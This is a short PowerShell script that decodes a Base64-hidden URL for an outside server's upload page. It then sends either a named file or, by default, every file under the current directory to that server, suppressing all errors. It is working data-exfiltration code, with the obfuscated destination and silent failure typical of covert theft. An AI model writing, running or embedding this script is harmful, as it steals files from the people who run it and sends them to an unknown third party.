param([string]$f);$r='aHR0cHM6Ly9zZWN4cGxvcmVycy5pbmZvL3UucGhw';$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r));function s($p){if(!(Test-Path $p)){return};try{(New-Object Net.WebClient).UploadFile($u,$p)}catch{}};if([string]::IsNullOrEmpty($f)){gci -r -file|%{s $_.FullName}}else{s $f}
